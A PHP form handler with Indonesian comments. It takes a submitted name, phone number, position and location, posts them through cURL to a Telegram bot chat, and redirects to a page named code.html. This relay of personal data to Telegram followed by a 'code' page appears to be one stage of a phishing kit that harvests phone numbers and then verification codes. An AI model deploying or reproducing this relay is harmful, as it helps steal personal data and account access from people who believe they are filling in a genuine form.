<?php
// Mulai sesi
session_start();

// Termasuk file konfigurasi
require '../config.php'; // Pastikan ini menunjuk ke file yang benar

// Validasi dan ambil data dari form
$name = isset($_POST['name']) ? htmlspecialchars(trim($_POST['name'])) : null;
$phone = isset($_POST['phone']) ? htmlspecialchars(trim($_POST['phone'])) : null;
$position = isset($_POST['position']) ? htmlspecialchars(trim($_POST['position'])) : null;
$location = isset($_POST['location']) ? htmlspecialchars(trim($_POST['location'])) : null;

// Pastikan semua data yang diperlukan ada
if ($name && $phone && $position && $location) {
    // Simpan data ke dalam session
    $_SESSION['name'] = $name;
    $_SESSION['phone'] = $phone;
    $_SESSION['position'] = $position;
    $_SESSION['location'] = $location;

    // Format pesan yang akan dikirim ke Telegram
    $message = "•┌────═━┈📝┈━═────┐•\n";
    $message .= " ║\n";
    $message .= " ╠➥ *Nama:* `{$name}`\n";
    $message .= " ║\n";
    $message .= " ╠➥ *Nomor HP:* `{$phone}`\n";
    $message .= " ║\n";
    $message .= " ╠➥ *Posisi:* `{$position}`\n";
    $message .= " ║\n";
    $message .= " ╠➥ *Lokasi:* `{$location}`\n";
    $message .= " ║\n";
    $message .= "•└────═━┈🗺️┈━═────┘•";

    // URL API Telegram
    $url = "https://api.telegram.org/bot{$apiToken}/sendMessage";

    // Data yang akan dikirim ke API Telegram
    $data = array(
        'chat_id' => $chatId,
        'text' => $message,
        'parse_mode' => 'MarkdownV2'
    );

    // Gunakan cURL untuk mengirim data ke Telegram
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_POSTFIELDS, http_build_query($data));
    $result = curl_exec($ch);

    if ($result === FALSE) {
        echo "Error sending message to Telegram";
        var_dump(curl_error($ch)); // Menampilkan error cURL
        die();
    }

    curl_close($ch);

    // Redirect ke halaman code.html setelah sukses
    header('Location: ../data/code.html');
    exit();
} else {
    // Jika data tidak valid atau tidak lengkap
    die('Invalid input. Please ensure all required fields are filled.');
}
?>
